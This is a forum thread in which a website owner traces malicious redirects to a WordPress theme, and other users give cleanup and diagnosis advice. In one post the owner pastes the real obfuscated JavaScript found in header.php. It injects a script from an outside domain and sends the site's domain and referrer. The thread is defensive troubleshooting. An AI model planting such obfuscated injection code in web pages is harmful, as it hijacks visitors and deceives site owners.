Windows 7 Forums
Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: My Website links to Malicious sites

23 Jan 2013   #1

Windows 7 Ultimate x32
 
 
My Website links to Malicious sites

Good Day

I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.

Since it has been on the webserver (at a trusted hosting company), I get url redirects to malicious sites when I am browsing though my website.

Here is my site: http://evolutionof4.co.za

The malicious sites it links to are: themeforest.net, carolini.net amongst others.

I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.

I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...

Any help?

Thank you

My System SpecsSystem Spec
.

23 Jan 2013   #2

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

It is my understanding that Wordpress can be vulnerable to malicious code, have you seen these?

https://wordpress.org/support/topic/...malcious-sites

Some really good information here: FAQ My site was hacked « WordPress Codex

Do a search for: Wordpress Website links to Malicious sites
My System SpecsSystem Spec
23 Jan 2013   #3

Windows 7 64 / Windows 8 64
 
 

1. Investigate if there is .htaccess file and if it is infected or not.
2. Investigate if there is weird code in index.php or oother php scrips. You might wish to extract default Wordpress 3.5 on top.
3. Disable your theme and plugins one by one and see if problems continue.
My System SpecsSystem Spec
.


23 Jan 2013   #4

Windows 7 Ultimate x32
 
 

Thank you guys. The suggestions helped. Appreciate!

I think the following code is producing the problem. It was in my header.php page:

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|w rite|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
My System SpecsSystem Spec
23 Jan 2013   #5

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

You are welcome, glad we could help!

Are you saying the whole section of code looks suspicious because it is code you do not remember using?

I am not very knowledgeable about Wordpress code, but these two areas do:
{return c.toString(a)};if(!''.replace(/^/,String)) and |scr|ipt|.

Return, if, then replace, and why would you place a bar between words?

Maybe gied could explain?

Have you been able to re-work the code and test it?
My System SpecsSystem Spec
23 Jan 2013   #6

Windows 7 64 / Windows 8 64
 
 

This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
as header.php file is infected, one should think how it could happen:
1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
2. Hosting provider screwed up
3. There is vulnerability in plugin, theme.
4. The theme was infected before installation.
My System SpecsSystem Spec
23 Jan 2013   #7

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

gied, how does a Wordpress user know what code is malevolent?
My System SpecsSystem Spec
23 Jan 2013   #8

Windows 7 Pro. 64/SP-1
 
 

My System SpecsSystem Spec
24 Jan 2013   #9

Windows 7 Ultimate x32
 
 

Thank you so much guys. Really appreciate the tips and helpful links.

@gied:
Quote   Quote: Originally Posted by gied View Post
This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
as header.php file is infected, one should think how it could happen:
1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
2. Hosting provider screwed up
3. There is vulnerability in plugin, theme.
4. The theme was infected before installation.
I doubt if anyone hacked my ftp account. I use wireshark myself and I know how easy it is to sniff unencrypted credentials. I think the theme I used (Themeforest.net) contained the code from the start, since the files were there from the start I suspect...Also, some of the sites it redirects to are the theme creator's site - they just want exposure, traffic and SEO backlinks to their site...

Thank you for your expert opinion
My System SpecsSystem Spec
24 Jan 2013   #10

Windows 7 64 / Windows 8 64
 
 

Anak: Obscure JS in place that does not make sense is by default malicious. So is for example code, that tries to determine referer and/or redirects to other website. There are no very good tools to detect the code, but one has to inspect it for something strange. Also, one can compare files one by one with the ones of clean install. The real problem is with unsafe plugins though. Or malicious theme creators.
DexterousDave:
If this is theme creator sites, then yeah. It is bad that Themeforest distributes malicious themes
My System SpecsSystem Spec
Reply

 My Website links to Malicious sites




Thread Tools




Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd

All times are GMT -5. The time now is 03:30 PM.
Twitter Facebook Google+



Windows 7 Forums

Seven Forums Android App Seven Forums IOS App
  

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33